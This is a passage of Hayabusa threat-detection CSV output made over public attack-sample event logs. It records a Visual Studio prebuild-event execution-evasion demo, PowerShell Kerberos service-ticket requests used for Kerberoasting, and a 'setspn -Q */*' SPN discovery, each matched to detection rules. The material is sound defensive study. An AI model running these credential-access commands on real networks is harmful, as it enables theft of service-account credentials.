7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.558 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.560 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.561 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.683 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.972 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.399 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.229 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.303 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.305 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:33.197 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,$SPNName = 'MSSQLSvc/Svc-SQL-DB01.offsec.lan',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-Type -AssemblyNAme System.IdentityModel,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Type): ""Add-Type"" ParameterBinding(Add-Type): name=""AssemblyName""; value=""System.IdentityModel""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.561 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""ArgumentList""; value=""MSSQLSvc/Svc-SQL-DB01.offsec.lan"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IdentityModel.Tokens.KerberosRequestorSecurityToken"" TerminatingError(New-Object): ""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.686 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.717 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.717 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.733 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.733 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account 